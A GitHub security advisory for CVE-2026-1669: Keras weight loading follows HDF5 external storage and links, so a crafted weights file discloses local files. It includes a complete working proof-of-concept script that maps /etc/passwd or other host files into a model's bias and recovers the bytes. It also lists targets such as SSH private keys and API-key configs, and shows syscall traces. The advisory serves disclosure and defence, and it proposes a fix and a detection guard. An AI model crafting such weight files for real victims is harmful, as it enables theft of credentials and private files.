GHSA-3M4Q-JMJ6-R34Q
Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41
Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).
- Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.
- Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/<user>/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).
- Execution: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
- Exfiltration vectors:
- Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
- Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
- If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
- Environments with strict filesystem permissioning or sandboxing (e.g., a container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via `python -m pip install -U ...`):
  - `tensorflow==2.20.0`
  - `keras==3.11.3`
  - `h5py==3.15.1`
  - `numpy==2.3.4`
- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.
- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as `weights_external_demo.py`:
```python
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py

def choose_host_file() -> Path:
    candidates = [
        os.environ.get("KFLI_PATH"),
        "/etc/machine-id",
        "/etc/hostname",
        "/proc/sys/kernel/hostname",
        "/etc/passwd",
    ]
    for candidate in candidates:
        if not candidate:
            continue
        path = Path(candidate)
        if path.exists() and path.is_file():
            return path
    raise FileNotFoundError("set KFLI_PATH to a readable file")

def build_model(units: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(1,), name="input"),
        tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
    ])
    model(tf.zeros((1, 1)))  # build weights
    return model

def find_bias_dataset(h5file: h5py.File) -> str:
    matches: list[str] = []
    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
            matches.append(name)
    h5file.visititems(visit)
    if not matches:
        raise RuntimeError("bias dataset not found")
    return matches[0]

def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
    with h5py.File(path, "r+") as h5file:
        bias_path = find_bias_dataset(h5file)
        parent = h5file[str(Path(bias_path).parent)]
        dset_name = Path(bias_path).name
        del parent[dset_name]
        max_bytes = 128
        size = host_file.stat().st_size
        nbytes = min(size, max_bytes)
        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing
        units = max(1, nbytes // 4)
        parent.create_dataset(
            dset_name,
            shape=(units,),
            dtype="float32",
            external=[(host_file.as_posix(), 0, nbytes)],
        )
    return units, nbytes

def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
    raw = np.ascontiguousarray(arr).view(np.uint8)
    ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
    hex_preview = raw[:64].tobytes().hex()
    return ascii_preview, hex_preview

def main() -> None:
    host_file = choose_host_file()
    model = build_model(units=32)

    weights_path = Path("weights_demo.h5")
    model.save_weights(weights_path.as_posix())

    units, nbytes = rewrite_bias_external(weights_path, host_file)
    print("secret_text_source", host_file)
    print("units", units, "bytes_mapped", nbytes)

    model.load_weights(weights_path.as_posix())
    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
    ascii_preview, hex_preview = floats_to_ascii(output)
    print("recovered_ascii", ascii_preview)
    print("recovered_hex64", hex_preview)

    saved = Path("weights_demo_resaved.h5")
    model.save_weights(saved.as_posix())
    print("resaved_weights", saved.as_posix())

if __name__ == "__main__":
    main()
```
- Execute `python weights_external_demo.py`.
- Observe:
  - `secret_text_source` prints the chosen host file path.
  - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.
  - A re-saved weights file contains the leaked bytes inside the artifact.
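The exfiltration step relies on nothing more than byte reinterpretation: the float32 bias tensor is a view over whatever bytes HDF5 streamed in, so reversing the view recovers the file verbatim. A minimal round trip (using a hypothetical secret string, no Keras required) illustrates this:

```python
import numpy as np

# Stand-in for leaked file contents (hypothetical; 32 bytes = 8 float32 values).
secret = b"root:x:0:0:root:/root:/bin/bash\n"
assert len(secret) % 4 == 0

# What external storage effectively does: reinterpret raw bytes as float32.
bias = np.frombuffer(secret, dtype=np.float32)

# What floats_to_ascii undoes: reinterpret the floats back into bytes.
recovered = np.ascontiguousarray(bias).view(np.uint8).tobytes()
assert recovered == secret
```

Because the mapping is lossless and the PoC avoids any arithmetic on the injected values (zero input, no activation), inference output exposes the original bytes exactly.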
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
  - External storage dataset: dataset references `/etc/hosts`.
  - External link: `ExternalLink` pointing at `/etc/passwd`.
  - Indirect link: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.
- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.
- Post-process traces and weight tensors to show the exact bytes loaded.
Relevant syscall excerpts captured during the run:
```
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13
```
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
  - Inspect creation property lists (`get_external_count`) before materialising tensors.
  - Resolve `SoftLink`/`ExternalLink` targets and block if they leave the HDF5 file.
- Provide an escape hatch:
  - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.
- Documentation:
  - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
  - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
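The property-list check can be prototyped directly against h5py's low-level API; the function name here is ours, not proposed Keras code:

```python
import h5py

def refuse_external_storage(h5file: h5py.File) -> None:
    """Raise before any tensor is read if a dataset uses HDF5 external storage (sketch)."""
    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset):
            dcpl = obj.id.get_create_plist()  # dataset creation property list
            if dcpl.get_external_count() > 0:
                # get_external(0) returns (filename, offset, size) of segment 0
                target = dcpl.get_external(0)[0]
                raise ValueError(f"dataset {name!r} maps external file {target!r}")
    h5file.visititems(visit)
```

A loader wired this way fails closed on the PoC artifact while passing ordinary weight files untouched; the proposed `allow_external_data=True` escape hatch would simply skip the check.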
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.
- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.
- If loading untrusted weights is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.13.0"
},
{
"fixed": "3.13.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.12.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-1669"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T22:41:58Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"id": "GHSA-3m4q-jmj6-r34q",
"modified": "2026-02-18T22:41:58Z",
"published": "2026-02-18T22:41:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/22057"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}